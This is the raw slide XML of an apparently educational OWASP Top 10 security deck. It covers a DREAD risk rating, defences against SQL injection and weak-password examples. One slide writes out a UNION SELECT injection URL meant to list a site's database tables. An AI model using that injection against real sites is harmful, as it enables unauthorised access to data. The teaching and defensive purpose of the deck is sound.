            <a:chOff x="0" y="0"/>
            <a:chExt cx="10664642" cy="4272726"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1393" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10664643" cy="4272727"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50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394" name="www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables–"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="89332" y="645516"/>
              <a:ext cx="10485978" cy="31089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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables–	</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1396" name="the page should show all the tables in the database,"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060950" y="7085034"/>
            <a:ext cx="7305400"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the page should show all the tables in the database,</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1400" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="541866" y="2275839"/>
          <a:ext cx="11673255" cy="1786957"/>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5172660"/>
                <a:gridCol w="540060"/>
                <a:gridCol w="787874"/>
                <a:gridCol w="842060"/>
                <a:gridCol w="842060"/>
                <a:gridCol w="842060"/>
                <a:gridCol w="1202944"/>
                <a:gridCol w="1443532"/>
              </a:tblGrid>
              <a:tr h="893477">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>Threat</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>D</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>R</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>E</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>A</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>D</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>Total</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>Rating</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r>
              <a:tr h="893477">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>SQL commands injected into application.</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914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>3</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914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>3</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914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>3</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914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>3</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914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>2</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914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>14</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914400">
                        <a:defRPr sz="2400">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>High</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1401" name="12–15 High risk,8–11 Medium risk, 5–7 Low risk."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5743786" y="8994986"/>
            <a:ext cx="7044268" cy="4856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914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>12–15 High risk,8–11 Medium risk, 5–7 Low risk.</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06" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="2500801"/>
            <a:ext cx="13004801" cy="4751998"/>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8" name="Defense"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1409" name="Use of Prepared Statements (Parameterized Queries)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275840"/>
            <a:ext cx="11704322" cy="6436926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Use of Prepared Statements (Parameterized Queries)</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Use of Stored Procedures</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Escaping all User Supplied Input</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:t>Principle of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Least Privilege</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>White List Input Validation</a:t>
            </a:r>
            <a:r>
              <a:t> </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1" name="A2 : Broken Authentication"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A2 : Broken Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141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14" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705100" y="2749550"/>
            <a:ext cx="7594600" cy="42545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7" name="A1:2017 - Injection…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95409" y="1270000"/>
            <a:ext cx="7221635" cy="7213600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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A1:2017 - Injection</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A2:2017 - Broken Authentication</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A3:2017 - Sensitive Data Exposure</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A4:2017 - XML External Entities (XXE)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A5:2017 - Broken Access Control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A6:2017 - Security Misconfiguration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A7:2017 - Cross-Site Scripting (XSS)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A8:2017 - Insecure Deserialization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A9:2017 - Using Components with Known Vulnerabilities </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r>
              <a:t>A10:2017 - Insufficient Logging &amp; Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="139700" algn="l"/>
                <a:tab pos="457200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="M1: 2016 - Improper Platform Usage…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386110" y="1270000"/>
            <a:ext cx="5364712" cy="67127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M1: 2016 - Improper Platform Usage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M2: 2016 - Insecure Data Storage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M3: 2016 - Insecure Communication</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M4: 2016 - Insecure Authentication</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M5: 2016 - Insufficient Cryptography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M6: 2016 - Insecure Authorization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M7: 2016 - Client Code Quality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M8: 2016 - Code Tampering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M9: 2016 - Reverse Engineering </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="139700" algn="l"/>
                <a:tab pos="457200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>M10: 2016 - Extraneous Functionality </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="OWASP Top 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="1300480">
              <a:defRPr sz="6200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>OWASP Top 10</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6" name="A2 : Part 1 Broken Authentication"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A2 : Part 1 Broken Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14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421" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="985999" y="2695386"/>
            <a:ext cx="11032802" cy="3656696"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11032801" cy="3656695"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1419" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="11032802" cy="3656696"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 6067"/>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650240">
                <a:tabLst>
                  <a:tab pos="647700" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1420" name="Very short or blank…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="92416" y="270660"/>
              <a:ext cx="10474420" cy="31247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lvl="1" marL="739832" indent="-374072" algn="l" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="3000">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>Very short or blank</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1" marL="739832" indent="-374072" algn="l" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="3000">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>Common dictionary words or names</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1" marL="739832" indent="-374072" algn="l" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="3000">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>Set to the same as the username</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1" marL="739832" indent="-374072" algn="l" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="3000">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>Still set to a default value</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1422" name="Bad Passwords"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Bad Passwords</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426" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="985999" y="2695386"/>
            <a:ext cx="11032802" cy="5338986"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11032801" cy="5338985"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1424" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="11032802" cy="5338986"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4155"/>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650240">
                <a:tabLst>
                  <a:tab pos="647700" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1425" name="test…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="92416" y="270660"/>
              <a:ext cx="10474420" cy="46809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marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>test</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>testuser</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr>
                  <a:latin typeface="Lucida Sans Typewriter"/>
                  <a:ea typeface="Lucida Sans Typewriter"/>
                  <a:cs typeface="Lucida Sans Typewriter"/>
                  <a:sym typeface="Lucida Sans Typewriter"/>
                </a:rPr>
                <a:t>admin</a:t>
              </a:r>
              <a:endParaRPr>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:ea typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
                <a:sym typeface="Lucida Sans Typewriter"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="377190" indent="-377190" algn="l" defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="AA2B1E"/>
                </a:buClr>
                <a:buSzPct val="85000"/>
                <a:buFont typeface="Brush Script MT"/>
                <a:buChar char="O"/>
                <a:defRPr sz="2200">
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
